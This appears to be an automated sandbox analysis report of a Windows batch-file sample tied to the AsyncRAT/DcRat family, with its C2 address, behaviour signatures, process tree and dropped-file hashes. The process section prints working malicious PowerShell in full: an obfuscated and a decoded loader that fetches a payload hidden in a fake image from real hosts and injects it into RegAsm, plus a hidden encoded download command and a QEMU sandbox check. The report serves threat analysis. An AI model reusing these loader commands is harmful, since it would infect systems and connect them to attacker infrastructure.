Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18-12-2024 02:36
Static task
static1
Behavioral task
behavioral1
Sample
5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c.bat
Resource
win7-20240903-en
General
-
Target
5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c.bat
-
Size
14KB
-
MD5
b4ca7ff5efd0278fef09daf595489560
-
SHA1
112847b2bf3d344b10aae9d6bb375de51b0d3b7b
-
SHA256
5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c
-
SHA512
5e3933d702ecad73bdd81723bd2de7bfb919a10e768a2f1a7e2c90bdb02b6f6ee30a80a9233fe7ca3bc72efb3e7b1f20ff3a6bd05960e172d77bc928418b25b2
-
SSDEEP
192:SLmONLs0foAt5SVQfFY3vJG5finGma/E0DlNwYaJQnY+1adnG7RQBaFovHSehrvb:/0foNGUvoLwzJQIdnG7R/EHZbGNpM
Malware Config
Extracted
asyncrat
1.0.7
Default
103.125.189.155:8848
DcRatMutex_6565
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 4 IoCs
flow pid Process 6 536 powershell.exe 10 536 powershell.exe 15 536 powershell.exe 17 3696 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3696 powershell.exe 2748 powershell.exe 536 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c.bat cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 bitbucket.org 6 bitbucket.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 536 set thread context of 4988 536 powershell.exe 89 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2980 WINWORD.EXE 2980 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2748 powershell.exe 2748 powershell.exe 536 powershell.exe 536 powershell.exe 3696 powershell.exe 3696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 4032 WMIC.exe Token: SeSecurityPrivilege 4032 WMIC.exe Token: SeTakeOwnershipPrivilege 4032 WMIC.exe Token: SeLoadDriverPrivilege 4032 WMIC.exe Token: SeSystemProfilePrivilege 4032 WMIC.exe Token: SeSystemtimePrivilege 4032 WMIC.exe Token: SeProfSingleProcessPrivilege 4032 WMIC.exe Token: SeIncBasePriorityPrivilege 4032 WMIC.exe Token: SeCreatePagefilePrivilege 4032 WMIC.exe Token: SeBackupPrivilege 4032 WMIC.exe Token: SeRestorePrivilege 4032 WMIC.exe Token: SeShutdownPrivilege 4032 WMIC.exe Token: SeDebugPrivilege 4032 WMIC.exe Token: SeSystemEnvironmentPrivilege 4032 WMIC.exe Token: SeRemoteShutdownPrivilege 4032 WMIC.exe Token: SeUndockPrivilege 4032 WMIC.exe Token: SeManageVolumePrivilege 4032 WMIC.exe Token: 33 4032 WMIC.exe Token: 34 4032 WMIC.exe Token: 35 4032 WMIC.exe Token: 36 4032 WMIC.exe Token: SeIncreaseQuotaPrivilege 4032 WMIC.exe Token: SeSecurityPrivilege 4032 WMIC.exe Token: SeTakeOwnershipPrivilege 4032 WMIC.exe Token: SeLoadDriverPrivilege 4032 WMIC.exe Token: SeSystemProfilePrivilege 4032 WMIC.exe Token: SeSystemtimePrivilege 4032 WMIC.exe Token: SeProfSingleProcessPrivilege 4032 WMIC.exe Token: SeIncBasePriorityPrivilege 4032 WMIC.exe Token: SeCreatePagefilePrivilege 4032 WMIC.exe Token: SeBackupPrivilege 4032 WMIC.exe Token: SeRestorePrivilege 4032 WMIC.exe Token: SeShutdownPrivilege 4032 WMIC.exe Token: SeDebugPrivilege 4032 WMIC.exe Token: SeSystemEnvironmentPrivilege 4032 WMIC.exe Token: SeRemoteShutdownPrivilege 4032 WMIC.exe Token: SeUndockPrivilege 4032 WMIC.exe Token: SeManageVolumePrivilege 4032 WMIC.exe Token: 33 4032 WMIC.exe Token: 34 4032 WMIC.exe Token: 35 4032 WMIC.exe Token: 36 4032 WMIC.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 536 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeDebugPrivilege 4988 RegAsm.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 2980 WINWORD.EXE 2980 WINWORD.EXE 2980 WINWORD.EXE 2980 WINWORD.EXE 2980 WINWORD.EXE 2980 WINWORD.EXE 2980 WINWORD.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1324 wrote to memory of 4032 1324 cmd.exe 84 PID 1324 wrote to memory of 4032 1324 cmd.exe 84 PID 1324 wrote to memory of 3476 1324 cmd.exe 85 PID 1324 wrote to memory of 3476 1324 cmd.exe 85 PID 1324 wrote to memory of 2748 1324 cmd.exe 87 PID 1324 wrote to memory of 2748 1324 cmd.exe 87 PID 2748 wrote to memory of 536 2748 powershell.exe 88 PID 2748 wrote to memory of 536 2748 powershell.exe 88 PID 536 wrote to memory of 4988 536 powershell.exe 89 PID 536 wrote to memory of 4988 536 powershell.exe 89 PID 536 wrote to memory of 4988 536 powershell.exe 89 PID 536 wrote to memory of 4988 536 powershell.exe 89 PID 536 wrote to memory of 4988 536 powershell.exe 89 PID 536 wrote to memory of 4988 536 powershell.exe 89 PID 536 wrote to memory of 4988 536 powershell.exe 89 PID 536 wrote to memory of 4988 536 powershell.exe 89 PID 1324 wrote to memory of 3696 1324 cmd.exe 90 PID 1324 wrote to memory of 3696 1324 cmd.exe 90 PID 3696 wrote to memory of 2980 3696 powershell.exe 91 PID 3696 wrote to memory of 2980 3696 powershell.exe 91
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5d3e1ec332b5f64b4fed0d5f4dae21008ae05ec7f754f804f813925c4573e12c.bat"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
C:\Windows\system32\find.exefind "QEMU"2⤵PID:3476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$HQ$ZQBz$HQ$aQBu$Gc$cwBv$G0$ZQB0$Gg$aQBu$Gc$d$$v$GY$ZwBo$Gg$a$Bo$Gg$a$Bo$Gg$a$Bk$Gc$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DU$Mw$3$DY$MQ$y$Cc$L$$g$Cc$a$B0$HQ$c$$6$C8$Lw$x$D$$Mw$u$DI$ZQ$u$DY$Mg$v$HQ$ZQBz$HQ$XwBp$G0$Zw$u$Go$c$Bn$Cc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$D0$I$BE$G8$dwBu$Gw$bwBh$GQ$R$Bh$HQ$YQBG$HI$bwBt$Ew$aQBu$Gs$cw$g$CQ$b$Bp$G4$awBz$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$t$G4$ZQ$g$CQ$bgB1$Gw$b$$p$C$$ew$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$FQ$ZQB4$HQ$LgBF$G4$YwBv$GQ$aQBu$Gc$XQ$6$Do$VQBU$EY$O$$u$Ec$ZQB0$FM$d$By$Gk$bgBn$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$UwBU$EE$UgBU$D4$Pg$n$Ds$I$$k$GU$bgBk$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBF$E4$R$$+$D4$Jw$7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$p$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$GU$bgBk$EY$b$Bh$Gc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$LQBn$GU$I$$w$C$$LQBh$G4$Z$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQBn$HQ$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$KQ$g$Hs$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$r$D0$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C4$T$Bl$G4$ZwB0$Gg$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$C$$PQ$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQ$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$UwB1$GI$cwB0$HI$aQBu$Gc$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$L$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$JwB0$Hg$d$$u$GM$cgBj$GQ$awBl$GU$Lw$y$DY$Lg$y$D$$MQ$u$D$$Mg$u$DM$M$$x$C8$Lw$6$H$$d$B0$Gg$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$UgBl$Gc$QQBz$G0$Jw$s$C$$Jw$w$Cc$KQ$p$H0$fQ$=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('$','A')));powershell.exe $OWjuxD"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/testingsomethingt/fghhhhhhhhhdg/downloads/new_img.jpg?537612', 'http://103.2e.62/test_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.crcdkee/26.201.02.301//:ptth', '0', 'StartupName', 'RegAsm', '0'))}}"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4988
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOWeRshElL.eXE -EX bYPasS -nOp -W hiDdeN -eC IAAgAGkAUgBtACAACQAtAFUAUgBpACAAKAAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvADQAMAA0AC4AZABvAB0gIAAJACAACQArACAACQAdIGMAeAAdICAACQApACAALQBvAFUAVABGAEkATABFACAACQAdICQARQBOAFYAOgBhAHAAUABkAGEAdABBAFwAZABvAG4AaABhAG4AZwAuAGQAbwBjAHgAHSAgAAkAOwAgAAkAaQBuAHYATwBrAEUALQBpAFQAZQBtACAAHSAkAEUATgB2ADoAYQBwAHAAZABBAHQAQQBcAGQAbwBuAGgAYQBuAGcALgBkAG8AYwB4AB0g2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\donhang.docx" /o ""3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2980
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
330B
MD5b98a08b5658f4dfe43e365fbc880ec92
SHA1809ca8dba94ed669ede1f46b831648a7adfd6394
SHA25676b48c282ab5fb0c4509db62907d32c6cf3d71690a07b33c807f053bd1c29bf9
SHA5124e7676cbf364add2899ffd30bf21f48f4d3f487eea0454b645dbd40c12d911c548497c27aeef9470a28f08dea5262aaa476e9bc80b819a1034c1f796363f9117
-
Filesize
16B
MD5d29962abc88624befc0135579ae485ec
SHA1e40a6458296ec6a2427bcb280572d023a9862b31
SHA256a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA5124311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize2KB
MD5b84f06a1f36e6e62987e6feda4ce3a01
SHA16c40549120e4941e9405bcf84c75d139d175f23b
SHA256b721506dedcd0a734788e3ac96752e6f6b23df7ae8b2953179bb68a3f4d04ff5
SHA512e2562fd38f8edc0a5a956d47aecfb958f28dc94ed5b6158886c4fd29df008a295aef06f17afde5edf5bc2fe758cfb9506307af29d250dbbc02e15f3aa77335aa
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize1KB
MD558505df9ab30d6fa8f0260458fa262b0
SHA14c923636f055dd057a3140e03bfa90aba499496d
SHA256112a180e118f36eadcff5d03fc00db499f04dfba106b79b70e7b213bc63e97ae
SHA5126699d2f9eb7687cef5fbf138960624d37c649c2357b575c0aee9f2c04b911900a5a5e5930e13d0aaec1f1f348f8040a0dcf0c20f355f03faf3646cf787eacdbf
-
Filesize
12KB
MD5ff3620557b65e6e8dd8816643d785c5a
SHA1d5021480b7cac2066462829c53dc18615642c579
SHA25685225d3c39423bbfc05e9d52351a9b00670fee3565457e5c3f75caac27ca4de9
SHA512c2a842bfa4f3caf50d58d5707ca0ad978e04e5111fe20ad468282c216567d25da7022fb7ff2681cb72acc8add3cbcf37000b6bde06ad252758f6ff06c9fb3d34